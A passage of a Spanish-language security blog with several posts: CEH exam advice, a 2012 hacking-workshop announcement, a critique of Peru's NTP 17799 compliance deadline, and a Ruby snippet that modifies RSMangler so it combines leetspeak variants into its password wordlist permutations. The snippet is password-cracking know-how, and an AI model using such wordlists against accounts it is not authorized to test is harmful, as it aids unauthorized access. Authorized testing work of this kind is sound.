Tambien, una mirada al C|EH Handbook ayudara con mas detalles https://cert.eccouncil.org/wp-content/uploads/2011/11/CEH-Candidate-Handbook-v1.6-13022012.pdf

2. Hay varias opciones locales de entrenamiento autorizado para prepararse para un examen de C|EH y, hasta donde, son : ETEK, Digiware, BS Grupo y Cyttek (que es una Academia autorizada ECA y ofrece una forma diferente de entrenamiento de EC Council, en resumen: un programa con varias certificaciones, con mas tiempo, menos costo, otro material)

3. Sugiero que retires ese enlace al final de la respuesta al comentario porque de no ser material meramente informativo, estarias faltando al codigo de etica de EC Council y perderas automaticamente la certificacion y no podras aplicar a ninguna otra.  En el C|EH Handbook lo puedes ver tambien.

Saludos,

Friday, June 08, 2012

GuayaquilHack 2012

A casi un año de mi último post, confirmo lo que siempre pensé : sí alguien bloguea con mucha frecuencia, es porque no trabaja mucho y a mi me pasa cada vez más que el trabajo no me deja tiempo para bloguear y, definitivamente, el micro mundo de Twitter o Linkedin resultan más rápidos.

También, quiero dejar registro que mi vida técnica no ha parado y muestra de ello es que me animé a subir un par de presentaciones que hice en varios eventos y un webinar.

Sin embargo, es mejor hacerlo en vivo y directo y por eso organizamos GuayaquilHack 2012.  Hoy en día abundan los eventos de seguridad, cada vez más se tienen eventos de in-seguridad y también hay mucha oferta de entrenamientos de hacking.  Nosotros mismos tenemos uno llamado OSEH que promovemos de alguna forma, pero, hace tiempo queriamos hacer dos talleres de tipo avanzado e introducir uno nuevo.

Los talleres avanzados corresponden a Web Application Hacking y Exploit Development.  El introductorio corresponde a Computación Forense.

Decidimos lanzarlos en Guayaquil porque estaremos dictando 2 cursos de Ethical Hacking en la ESPOL (como todos los años) y lo denominamos GuayaquilHack 2012 porque esperamos que sea el inicio.

Como dicen, las imágenes valen más que mil palabras :




Thursday, July 21, 2011

RSMangler personalizado para generar mas palabras h4x0r

El otro dia uno de los colegas en Open-Sec me hablaba sobre su fascinacion con CUPP (http://www.remote-exploit.org/?p=546) y como hacia algo que RSMangler no hace por default : generar palabras en h4x0r y someterlas a las mismas combinaciones que hace con las palabras normales.

Cuando uno pasa palabras de entrada a RSMangler y le pide generar palabras h4x0r a partir de las originales (opcion leet que esta activa por default), solamente genera una palabra h4x0r por cada palabra original y no la combina con otros valores como hace con las palabras originales y normales (numeros, letras, años, caracteres especiales). CUPP si lo hace.

Entonces, aparecio el reto y, en realidad, solo posteo esto para que se aprecie el valor del software abierto que permite que uno siga usando su aplicacion favorita solamente haciendo pequeños cambios al codigo fuente (en este caso es mas patente aun porque RSMangler es un script en Ruby).

La seccion de programa que hay que adicionar antes del loop de generacion es :

file_words.each { |y|
wordlist << y.gsub(/e/, "3").gsub(/a/, "4").gsub(/o/, "0").gsub(/i/, "1").gsub(/l/, "1")
}

wordlist.each { |x|
results << x

results << x+x if double
results << x.reverse if reverse
results << x.capitalize if capital
results << x.downcase if lower
results << x.upcase if upper
results << x.swapcase if swap
results << x + "ed" if ed
results << x + "ing" if ing

if common
(Continua el loop de generacion).

Como se ve, genera las palabras h4x0r adicionandolas a la lista original de forma que cuando entra al loop de permutaciones y generacion de palabras, tambien son afectadas, es decir, combinadas con los otros valores. De esta forma, esta funcionalidad hace lo mismo que CUPP.

Tambien es importante resaltar, por si no se aprecio, que la porcion de codigo necesaria ya se encuentra en el programa y solamente se aplica antes del loop de generacion.

NTP 17799 de cumplimiento obligatorio con fecha limite 31.12.2012

Esta norma ha hecho mucho bien a las organizaciones del Estado peruano porque ha hecho que esten mas concientizados, no importa que la mayoria ni siquiera ha leido el documento.

Tambien ha sido positivo porque al amparo de dicha norma, se han hecho evaluaciones de seguridad y negativa porque ha sido utilizada para justificar compras de productos que ni los usan o los usan mal.

Ahora, nuevamente se pone una fecha limite de cumplimiento como se hizo hace años. Que paso con los que no cumplieron ? Nada! Quien evalua el cumplimiento ? Nadie!

El Decreto no hace otra cosa que ser majadero al pedir cumplir con tener un plan de seguridad como si alguna organizacion en el mundo pudiese tomar la NTP 17799 (ISO 27002) y cumplir al 100% con todo lo expuesto en ella. Eso implica desconocer el estado evolutivo (involutivo en algunas entidades como la ONGEI) de toda organizacion y que eso es precisamente la base de tener un estandar que si es certificable (evaluable, comprobable, controlable) como el ISO 27001.

Definitivamente, yo ando pensando que solamente "la empresa privada" es la asesora de ONGEI y que cosas como esta obligatoriendad podrian estar apuntando a dejar sembradas opciones de negocio para esa "empresa privada". Espero equivocarme y que esto no sea asi.

Espero tambien, que el proximo gobierno ponga orden y defina una Oficina Nacional de Seguridad que defina la estrategia nacional de seguridad de la informacion y seguridad informatica.